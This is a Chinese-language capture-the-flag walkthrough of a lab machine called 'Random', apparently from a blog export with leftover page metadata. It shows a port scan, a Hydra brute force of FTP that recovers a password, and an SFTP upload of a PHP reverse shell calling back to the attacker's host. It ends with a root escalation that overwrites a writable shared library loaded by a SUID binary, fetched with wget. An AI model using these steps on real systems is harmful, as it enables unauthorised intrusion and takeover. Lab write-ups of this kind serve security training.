![\"image-20240912141155640\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121544477.png\")
<\/div>\n
![\"image-20240912144840474\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121544479.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83d\ude35 https:\/\/admin.tryhackme.com\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.103:21\nOpen 192.168.10.103:22\nOpen 192.168.10.103:80\n\nPORT STATE SERVICE REASON VERSION\n21\/tcp open ftp syn-ack vsftpd 3.0.3\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_drwxr-xr-- 2 1001 33 4096 Oct 19 2020 html\n| ftp-syst: \n| STAT: \n| FTP server status:\n| Connected to ::ffff:192.168.10.102\n| Logged in as ftp\n| TYPE: ASCII\n| No session bandwidth limit\n| Session timeout in seconds is 300\n| Control connection is plain text\n| Data connections will be plain text\n| At session startup, client count was 3\n| vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n22\/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 09:0e:11:1f:72:0e:6c:10:18:55:1a:73:a5:4b:e5:64 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLSgYLDfQbPEYlbJk0gqb+20RFg8gTuRcwH60QpS\/cc0adqQGZixvMG6C82PlCKYkY8FITrKpuzWRy4U2FIFMmHqxdLf\/63bCYURP4W\/M0pgjG9nADli+kzhAcpcpvAfuCxSrAXyBLhYOXSCyHzH7+t0f6Yo3xcDvw+a3xoDQGJoGvus9Mtmquhy5+a6svNUdUwhqO04YnuvXIJc8vsJuKEpbuM1DTLIafNcZ8WbxrukbEZJI5waDlzfTxNY0vK5BGsCFyNB2io3vkZmpyXpi+wLVThahdMeOqVZA5YlUFNVqUEi\/IzHbB58YtkAOLwO526FrLs8HiAlfwqNa0PCal\n| 256 c0:9f:66:34:56:1d:16:4a:32:ad:25:0c:8b:a0:1b:5a (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKCX9k1lfU5zOyr7\/QGNFwdlTCWMCdX7jV7GnO9v4C3y79efEtPZv4PeuVrEatM6bdy1U4xVZKM8Fvls+fVYAtw=\n| 256 4c:95:57:f4:38:a3:ce:ae:f0:e2:a6:d9:71:42:07:c5 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINZ6OAWr1xkHzpp4wdSCAOdwflN1vXUg4\/YlNvhEl1pN\n80\/tcp open http syn-ack nginx 1.14.2\n| http-methods: \n|_ Supported Methods: GET HEAD\n|_http-title: Site doesn't have a title (text\/html).\n|_http-server-header: nginx\/1.14.2\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php -b 301,401,403,404 -q\n^C\n[!] Keyboard interrupt detected, terminating.<\/code><\/pre>\n\u4e0d\u7528\u626b\u4e86\uff0c\u4f30\u8ba1\u662f\u6ca1\u6709\u70b9\u3002<\/p>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ curl http:\/\/$IP \n<pre>\n#########################WARNING##########################\neleanor, i disabled your ssh access.\nTake care.\n-alan\n##########################################################\n<\/pre><\/code><\/pre>\n\u5f97\u5230\u4e24\u4e2a\u7528\u6237\u540d\uff1a<\/p>\n
eleanor\nalan<\/code><\/pre>\n\u5176\u4e2deleanor<\/code>\u65e0ssh\u6743\u9650\u3002<\/p>\n\u654f\u611f\u7aef\u53e3<\/h3>\n
\u4f7f\u7528\u9ed8\u8ba4\u7528\u6237\u767b\u5f55ftp\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ ftp $IP \nConnected to 192.168.10.103.\n220 (vsFTPd 3.0.3)\nName (192.168.10.103:kali): anonymous\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> dir\n229 Entering Extended Passive Mode (|||48644|)\n150 Here comes the directory listing.\ndrwxr-xr-- 2 1001 33 4096 Oct 19 2020 html\n226 Directory send OK.\nftp> cd html\n550 Failed to change directory.<\/code><\/pre>\n\u53d1\u73b0\u5b58\u5728\u76ee\u5f55\uff0c\u4f46\u662f\u65e0\u6cd5\u767b\u5f55\u3002<\/p>\n
\u7206\u7834ftp<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ hydra -L user -P \/usr\/share\/wordlists\/rockyou.txt ftp:\/\/$IP -f\nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-09-12 03:01:59\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688798 login tries (l:2\/p:14344399), ~1793050 tries per task\n[DATA] attacking ftp:\/\/192.168.10.103:21\/\n[STATUS] 276.00 tries\/min, 276 tries in 00:01h, 28688522 to do in 1732:24h, 16 active\n[21][ftp] host: 192.168.10.103 login: eleanor password: ladybug\n[STATUS] attack finished for 192.168.10.103 (valid pair found)\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-09-12 03:03:35<\/code><\/pre>\n\u5c1d\u8bd5\u4e00\u4e0b\u8fd9\u4e2a\u7528\u6237\uff1a<\/p>\n
eleanor\nladybug<\/code><\/pre>\n\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ ftp $IP\nConnected to 192.168.10.103.\n220 (vsFTPd 3.0.3)\nName (192.168.10.103:kali): eleanor\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> dir\n229 Entering Extended Passive Mode (|||30985|)\n150 Here comes the directory listing.\ndrwxr-xr-- 2 1001 33 4096 Oct 19 2020 html\n226 Directory send OK.\nftp> cd html\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||30792|)\n150 Here comes the directory listing.\ndrwxr-xr-- 2 1001 33 4096 Oct 19 2020 .\ndrwxr-xr-x 3 0 113 4096 Oct 19 2020 ..\n-rw-r--r-- 1 33 33 185 Oct 19 2020 index.html\n226 Directory send OK.\nftp> get index.html\nlocal: index.html remote: index.html\n229 Entering Extended Passive Mode (|||8241|)\n150 Opening BINARY mode data connection for index.html (185 bytes).\n100% |************************************************************************************************************************************************| 185 108.44 KiB\/s 00:00 ETA\n226 Transfer complete.\n185 bytes received in 00:00 (53.08 KiB\/s)\nftp> exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ cat index.html \n<pre>\n#########################WARNING##########################\neleanor, i disabled your ssh access.\nTake care.\n-alan\n##########################################################\n<\/pre><\/code><\/pre>\n\u53cd\u5f39shell<\/h3>\n
\u5c1d\u8bd5\u4e0a\u4f20\uff0c\u53d1\u73b0\u4e0d\u80fd\u8fdb\u884c\u4e0a\u4f20\uff0c\u6743\u9650\u4e0d\u8db3\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ ftp $IP \nConnected to 192.168.10.103.\n220 (vsFTPd 3.0.3)\nName (192.168.10.103:kali): eleanor\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> dir\n229 Entering Extended Passive Mode (|||15374|)\n150 Here comes the directory listing.\ndrwxr-xr-- 2 1001 33 4096 Oct 19 2020 html\n226 Directory send OK.\nftp> cd html\n250 Directory successfully changed.\nftp> put revshell.php \nlocal: revshell.php remote: revshell.php\n229 Entering Extended Passive Mode (|||10218|)\n550 Permission denied.\nftp> exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ head revshell.php \n\n <?php\n \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n set_time_limit (0);\n $VERSION = "1.0";\n $ip = '192.168.10.102'; \/\/ You have changed this\n $port = 1234; \/\/ And this\n $chunk_size = 1400;<\/code><\/pre>\n\u5c1d\u8bd5\u4f7f\u7528\u8fd9\u4e2a\u7528\u6237 ssh \u767b\u5f55\uff0c\u53d1\u73b0\u5931\u8d25\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ ssh eleanor@$IP \nThe authenticity of host '192.168.10.103 (192.168.10.103)' can't be established.\nED25519 key fingerprint is SHA256:v2xcWcAAUcAUpB1Nz4duz+QZL1zveUkV\/SmLUqBhuUc.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '192.168.10.103' (ED25519) to the list of known hosts.\neleanor@192.168.10.103's password: \nThis service allows sftp connections only.\nConnection to 192.168.10.103 closed.<\/code><\/pre>\n\u4e0d\u51fa\u610f\u6599\u5931\u8d25\u4e86\uff0c\u4f46\u662f\u5f97\u5230\u4e86\u4e00\u4e2a\u63d0\u793a\uff0c\u4f7f\u7528sftp<\/code>\u53ef\u4ee5\u8fde\u63a5\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ sftp eleanor@$IP\neleanor@192.168.10.103's password: \nConnected to 192.168.10.103.\nsftp> dir\nhtml \nsftp> cd html\nsftp> put revshell.php \nUploading revshell.php to \/html\/revshell.php\nrevshell.php 100% 3912 1.9MB\/s 00:00 \nsftp> dir\nindex.html revshell.php \nsftp> exit<\/code><\/pre>\n\u4e0a\u4f20\u6210\u529f\uff0c\u8bbf\u95ee\u6fc0\u6d3b\u4e00\u4e0b\u5373\u53ef\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ curl http:\/\/$IP\/revshell.php\n<html>\n<head><title>504 Gateway Time-out<\/title><\/head>\n<body bgcolor="white">\n<center><h1>504 Gateway Time-out<\/h1><\/center>\n<hr><center>nginx\/1.14.2<\/center>\n<\/body>\n<\/html><\/code><\/pre>\n![\"image-20240912151640820\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@random:\/$ cat \/etc\/passwd | grep sh\nroot:x:0:0:root:\/root:\/bin\/bash\nalan:x:1000:1000:alan,,,:\/srv\/ftp:\/bin\/bash\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\neleanor:x:1001:1001:,,,:\/srv\/ftp:\/bin\/bash\n(remote) www-data@random:\/$ ls -la \/home\ntotal 16\ndrwxr-xr-x 4 root root 4096 Oct 19 2020 .\ndrwxr-xr-x 18 root root 4096 Oct 19 2020 ..\ndrwxr-xr-x 2 alan alan 4096 Oct 19 2020 alan\ndrwxr-xr-x 2 eleanor eleanor 4096 Oct 19 2020 eleanor\n(remote) www-data@random:\/$ cd \/home\/alan\n(remote) www-data@random:\/home\/alan$ ls -la\ntotal 56\ndrwxr-xr-x 2 alan alan 4096 Oct 19 2020 .\ndrwxr-xr-x 4 root root 4096 Oct 19 2020 ..\n-rw------- 1 alan alan 52 Oct 19 2020 .Xauthority\n-rw-r--r-- 1 alan alan 220 Oct 19 2020 .bash_logout\n-rw-r--r-- 1 alan alan 3526 Oct 19 2020 .bashrc\n-rw-r--r-- 1 alan alan 807 Oct 19 2020 .profile\n-rw------- 1 alan alan 162 Oct 19 2020 note.txt\n-rwsr-sr-x 1 root root 16832 Oct 19 2020 random\n-rw-r--r-- 1 root root 19 Oct 19 2020 root.h\n-rw-r--r-- 1 root root 1576 Oct 19 2020 rooter.o\n(remote) www-data@random:\/home\/alan$ cat root.h\nvoid makemeroot();\n(remote) www-data@random:\/home\/alan$ cat rooter.o \nELF>\ufffd@@\nUH\ufffd\ufffdH\ufffd=\ufffd\ufffd]\ufffdSUCCESS!! But I need to finish and implement this functionGCC: (Debian 8.3.0-6) 8.3.0zRx\nN A\ufffdC\n\ufffd\ufffd\n+rooter.cmakemeroot_GLOBAL_OFFSET_TABLE_puts\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\n\n \ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd .symtab.strtab.shstrtab.rela.text.data.bss.rodata.comment.note.GNU-stack.rela.eh_frame @80\n&SS1X90\ufffdB\ufffdW\ufffdR@h\n\ufffd \n 0\ufffda(remote) www-data@random:\/home\/alan$ cd ..\/eleanor\/\n(remote) www-data@random:\/home\/eleanor$ ls -la\ntotal 28\ndrwxr-xr-x 2 eleanor eleanor 4096 Oct 19 2020 .\ndrwxr-xr-x 4 root root 4096 Oct 19 2020 ..\n-rw-r--r-- 1 eleanor eleanor 220 Oct 19 2020 .bash_logout\n-rw-r--r-- 1 eleanor eleanor 3526 Oct 19 2020 .bashrc\n-rw-r--r-- 1 eleanor eleanor 807 Oct 19 2020 .profile\n-rw------- 1 eleanor eleanor 80 Oct 19 2020 note.txt\n-rw------- 1 eleanor eleanor 14 Oct 19 2020 user.txt\n(remote) www-data@random:\/home\/eleanor$ sudo -l\nbash: sudo: command not found<\/code><\/pre>\nsu \u5207\u6362\u7528\u6237<\/h3>\n(remote) www-data@random:\/var\/www\/html$ ls -la \/srv\/ftp\ntotal 12\ndrwxr-xr-x 3 root ftp 4096 Oct 19 2020 .\ndrwxr-xr-x 3 root root 4096 Oct 19 2020 ..\ndrwxr-xr-- 2 eleanor www-data 4096 Sep 12 03:15 html\n(remote) www-data@random:\/var\/www\/html$ cd \/srv\/ftp\/html\n(remote) www-data@random:\/srv\/ftp\/html$ ls -la\ntotal 16\ndrwxr-xr-- 2 eleanor www-data 4096 Sep 12 03:15 .\ndrwxr-xr-x 3 root ftp 4096 Oct 19 2020 ..\n-rw-r--r-- 1 www-data www-data 185 Oct 19 2020 index.html\n-rw-r--r-- 1 eleanor eleanor 3912 Sep 12 03:15 revshell.php\n(remote) www-data@random:\/srv\/ftp\/html$ su eleanor\nPassword: \neleanor@random:~\/html$ cd ~\neleanor@random:~$ ls -la\ntotal 12\ndrwxr-xr-x 3 root ftp 4096 Oct 19 2020 .\ndrwxr-xr-x 3 root root 4096 Oct 19 2020 ..\ndrwxr-xr-- 2 eleanor www-data 4096 Sep 12 03:15 html\neleanor@random:~$ cd \/home\/eleanor\/\neleanor@random:\/home\/eleanor$ ls -la\ntotal 28\ndrwxr-xr-x 2 eleanor eleanor 4096 Oct 19 2020 .\ndrwxr-xr-x 4 root root 4096 Oct 19 2020 ..\n-rw-r--r-- 1 eleanor eleanor 220 Oct 19 2020 .bash_logout\n-rw-r--r-- 1 eleanor eleanor 3526 Oct 19 2020 .bashrc\n-rw------- 1 eleanor eleanor 80 Oct 19 2020 note.txt\n-rw-r--r-- 1 eleanor eleanor 807 Oct 19 2020 .profile\n-rw------- 1 eleanor eleanor 14 Oct 19 2020 user.txt\neleanor@random:\/home\/eleanor$ cat user.txt \nihavethapowah\neleanor@random:\/home\/eleanor$ cat note.txt \nalan disabled my access via SSH but not my account.\nHe is a bad admin!\n-eleanor<\/code><\/pre>\n\u52ab\u6301\u94fe\u63a5\u5e93\u63d0\u6743<\/h3>\n(remote) eleanor@random:\/home\/eleanor$ cd ..\/alan\/\n(remote) eleanor@random:\/home\/alan$ ls -la\ntotal 56\ndrwxr-xr-x 2 alan alan 4096 Oct 19 2020 .\ndrwxr-xr-x 4 root root 4096 Oct 19 2020 ..\n-rw-r--r-- 1 alan alan 220 Oct 19 2020 .bash_logout\n-rw-r--r-- 1 alan alan 3526 Oct 19 2020 .bashrc\n-rw------- 1 alan alan 162 Oct 19 2020 note.txt\n-rw-r--r-- 1 alan alan 807 Oct 19 2020 .profile\n-rwsr-sr-x 1 root root 16832 Oct 19 2020 random\n-rw-r--r-- 1 root root 1576 Oct 19 2020 rooter.o\n-rw-r--r-- 1 root root 19 Oct 19 2020 root.h\n-rw------- 1 alan alan 52 Oct 19 2020 .Xauthority\n(remote) eleanor@random:\/home\/alan$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.10.104 - - [12\/Sep\/2024 03:27:15] "GET \/random HTTP\/1.1" 200 -<\/code><\/pre>\n\u4f20\u8fc7\u6765\u770b\u4e00\u4e0b\u5565\u60c5\u51b5\uff0c\u4f7f\u7528ida<\/code>\u53cd\u7f16\u8bd1\u4e86\u4e00\u4e0b\uff1a<\/p>\n\/\/ main.c\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n int v3; \/\/ ST1C_4\n time_t v4; \/\/ rdi\n\n v3 = atoi(argv[1]);\n v4 = time(0LL);\n srand(v4);\n if ( v3 == rand() % 9 + 1 )\n makemeroot(v4);\n else\n puts("Wrong number");\n return 0;\n}<\/code><\/pre>\n\u903b\u8f91\u5f88\u7b80\u5355\uff0c\u5c31\u662f\u731c\u6570\uff0c\u968f\u4fbf\u9009\u4e00\u4e2a1~9<\/code>\u7684\u6570\u5b57\u57fa\u672c\u4e0a\u662f\u5fc5\u4e2d\u7684\uff0c\u4f46\u662f\u6ca1\u6709\u9690\u85cf\u53ef\u4ee5\u83b7\u53d6shell\u7684\u51fd\u6570\u6216\u8005\u65b9\u6cd5\uff0c\u67e5\u770b\u4e00\u4e0b\u94fe\u63a5\u5e93\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ ldd random\n linux-vdso.so.1 (0x00007ffd82952000)\n librooter.so => not found\n libc.so.6 => \/lib\/x86_64-linux-gnu\/libc.so.6 (0x00007fc9fa374000)\n \/lib64\/ld-linux-x86-64.so.2 (0x00007fc9fa57a000)<\/code><\/pre>\n\u627e\u4e00\u4e0b\u8fd9\u4e2a\u6ca1\u627e\u5230\u7684\uff01<\/p>\n
(remote) eleanor@random:\/home\/alan$ ldd random\n linux-vdso.so.1 (0x00007ffd348d4000)\n librooter.so => \/lib\/librooter.so (0x00007f69e6101000)\n libc.so.6 => \/lib\/x86_64-linux-gnu\/libc.so.6 (0x00007f69e5f40000)\n \/lib64\/ld-linux-x86-64.so.2 (0x00007f69e6112000)\n(remote) eleanor@random:\/home\/alan$ ls -la \/lib\/librooter.so\n-rwxrwxrwx 1 root root 15984 Oct 19 2020 \/lib\/librooter.so<\/code><\/pre>\n\u53d1\u73b0\u53ef\u5199\uff0c\u5c1d\u8bd5\u52ab\u6301\u94fe\u63a5\u5e93\uff1a<\/p>\n
(remote) eleanor@random:\/tmp$ nano exp.c\nUnable to create directory \/srv\/ftp\/.local\/share\/nano\/: No such file or directory\nIt is required for saving\/loading search history or cursor positions.\n\nPress Enter to continue\n\n(remote) eleanor@random:\/tmp$ cat exp.c\n#include <stdlib.h>\n\nvoid makemeroot()\n{\n setuid(0);\n setgid(0);\n system("\/bin\/bash");\n}\n(remote) eleanor@random:\/tmp$ gcc -shared exp.c -o \/lib\/librooter.so\nexp.c: In function \u2018makemeroot\u2019:\nexp.c:5:2: warning: implicit declaration of function \u2018setuid\u2019; did you mean \u2018setenv\u2019? [-Wimplicit-function-declaration]\n setuid(0);\n ^~~~~~\n setenv\nexp.c:6:2: warning: implicit declaration of function \u2018setgid\u2019; did you mean \u2018setenv\u2019? [-Wimplicit-function-declaration]\n setgid(0);\n ^~~~~~\n setenv\ncollect2: fatal error: cannot find 'ld'\ncompilation terminated.\n(remote) eleanor@random:\/tmp$ ls -la \/lib\/librooter.so\n-rwxrwxrwx 1 root root 15984 Oct 19 2020 \/lib\/librooter.so<\/code><\/pre>\n\u53d1\u73b0\u6ca1\u6210\u529f\uff0c\u672c\u5730\u94fe\u63a5\u4e00\u4e0b\u518d\u4f20\u8fc7\u53bb\uff1a<\/p>\n
# kali\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ gcc -shared a.c -o librooter.so \na.c: In function \u2018makemeroot\u2019:\na.c:5:9: warning: implicit declaration of function \u2018setuid\u2019 [-Wimplicit-function-declaration]\n 5 | setuid(0);\n | ^~~~~~\na.c:6:9: warning: implicit declaration of function \u2018setgid\u2019 [-Wimplicit-function-declaration]\n 6 | setgid(0);\n | ^~~~~~\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.10.103 - - [12\/Sep\/2024 03:38:33] "GET \/librooter.so HTTP\/1.1" 200 -\n\n# eleanor\n(remote) eleanor@random:\/tmp$ cd \/lib\n(remote) eleanor@random:\/lib$ wget http:\/\/192.168.10.102:8888\/librooter.so\n(remote) eleanor@random:\/lib$ ls -la librooter.so\n-rwxrwxrwx 1 root root 15984 Oct 19 2020 librooter.so\n(remote) eleanor@random:\/lib$ mv librooter.so librooter.so.bak\n(remote) eleanor@random:\/lib$ mv librooter.so.1 librooter.so\n(remote) eleanor@random:\/lib$ ls -la librooter.so\n-rw-rw-rw- 1 eleanor eleanor 15480 Sep 12 03:37 librooter.so\n(remote) eleanor@random:\/lib$ chmod +x librooter.so<\/code><\/pre>\n\u5c1d\u8bd5\u591a\u6b21\u8fd0\u884c\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u83b7\u53d6shell\uff01<\/p>\n
<\/div><\/p>\n\u62ff\u4e0b\u62ff\u4e0b\uff01<\/p>\n
root@random:\/home\/alan# ls -la\ntotal 56\ndrwxr-xr-x 2 alan alan 4096 Oct 19 2020 .\ndrwxr-xr-x 4 root root 4096 Oct 19 2020 ..\n-rw-r--r-- 1 alan alan 220 Oct 19 2020 .bash_logout\n-rw-r--r-- 1 alan alan 3526 Oct 19 2020 .bashrc\n-rw------- 1 alan alan 162 Oct 19 2020 note.txt\n-rw-r--r-- 1 alan alan 807 Oct 19 2020 .profile\n-rwsr-sr-x 1 root root 16832 Oct 19 2020 random\n-rw-r--r-- 1 root root 1576 Oct 19 2020 rooter.o\n-rw-r--r-- 1 root root 19 Oct 19 2020 root.h\n-rw------- 1 alan alan 52 Oct 19 2020 .Xauthority\nroot@random:\/home\/alan# cat note.txt \nI need to finish random program.\nNow it generates a random number between 1-10 and it compares\nthis number with my number.\nI will be happy if i guess the number.\nroot@random:\/home\/alan# cd \/root\nroot@random:\/root# ls -la\ntotal 24\ndrwx------ 3 root root 4096 Oct 19 2020 .\ndrwxr-xr-x 18 root root 4096 Oct 19 2020 ..\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwxr-xr-x 3 root root 4096 Oct 19 2020 .local\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\n-rw------- 1 root root 16 Oct 19 2020 root.txt<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"Random \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random] \u2514\u2500$ rus […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-806","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/806","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=806"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/806\/revisions"}],"predecessor-version":[{"id":807,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/806\/revisions\/807"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=806"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=806"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=806"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Random]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83d\ude35 https:\/\/admin.tryhackme.com\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.103:21\nOpen 192.168.10.103:22\nOpen 192.168.10.103:80\n\nPORT STATE SERVICE REASON VERSION\n21\/tcp open ftp syn-ack vsftpd 3.0.3\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_drwxr-xr-- 2 1001 33 4096 Oct 19 2020 html\n| ftp-syst: \n| STAT: \n| FTP server status:\n| Connected to ::ffff:192.168.10.102\n| Logged in as ftp\n| TYPE: ASCII\n| No session bandwidth limit\n| Session timeout in seconds is 300\n| Control connection is plain text\n| Data connections will be plain text\n| At session startup, client count was 3\n| vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n22\/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 09:0e:11:1f:72:0e:6c:10:18:55:1a:73:a5:4b:e5:64 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLSgYLDfQbPEYlbJk0gqb+20RFg8gTuRcwH60QpS\/cc0adqQGZixvMG6C82PlCKYkY8FITrKpuzWRy4U2FIFMmHqxdLf\/63bCYURP4W\/M0pgjG9nADli+kzhAcpcpvAfuCxSrAXyBLhYOXSCyHzH7+t0f6Yo3xcDvw+a3xoDQGJoGvus9Mtmquhy5+a6svNUdUwhqO04YnuvXIJc8vsJuKEpbuM1DTLIafNcZ8WbxrukbEZJI5waDlzfTxNY0vK5BGsCFyNB2io3vkZmpyXpi+wLVThahdMeOqVZA5YlUFNVqUEi\/IzHbB58YtkAOLwO526FrLs8HiAlfwqNa0PCal\n| 256 c0:9f:66:34:56:1d:16:4a:32:ad:25:0c:8b:a0:1b:5a (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKCX9k1lfU5zOyr7\/QGNFwdlTCWMCdX7jV7GnO9v4C3y79efEtPZv4PeuVrEatM6bdy1U4xVZKM8Fvls+fVYAtw=\n| 256 